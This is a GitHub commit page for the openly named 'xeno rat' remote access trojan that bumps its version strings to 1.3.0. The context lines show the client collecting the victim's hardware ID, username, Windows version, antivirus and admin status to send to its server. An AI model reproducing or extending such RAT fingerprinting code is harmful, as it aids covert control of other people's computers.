Skip to content

Commit

Permalink
improved screencontrol speed and fixed minor bug
Browse files Browse the repository at this point in the history
  • Loading branch information
moom825 committed Nov 22, 2023
1 parent 40a7fcd commit 97f12c4
Show file tree
Hide file tree
Showing 2 changed files with 2 additions and 2 deletions.
2 changes: 1 addition & 1 deletion xeno rat client/Handler.cs
Expand Up @@ -57,7 +57,7 @@ private async Task GetAndSendInfo(Node Type0)
return;
}
//get hwid, username etc. seperated by null
string clientversion = "1.2.0";//find a way to get the client version.
string clientversion = "1.3.0";//find a way to get the client version.
string[] info = new string[] { Utils.HWID(), Environment.UserName , clientversion, Utils.GetWindowsVersion(), Utils.GetAntivirus(), Utils.IsAdmin().ToString() };
byte[] data = new byte[0];
byte[] nullbyte = new byte[] { 0 };
Expand Down
2 changes: 1 addition & 1 deletion xeno rat server/MainForm.cs
Expand Up @@ -48,7 +48,7 @@ public MainForm()
{

InitializeComponent();
this.Text = "Xeno-rat: Created by moom825";
this.Text = "Xeno-rat: Created by moom825 - version 1.3.0";
key = Utils.CalculateSha256Bytes(string_key);

ListeningHandler =new Listener(OnConnect);
Expand Down

0 comments on commit 97f12c4

Please sign in to comment.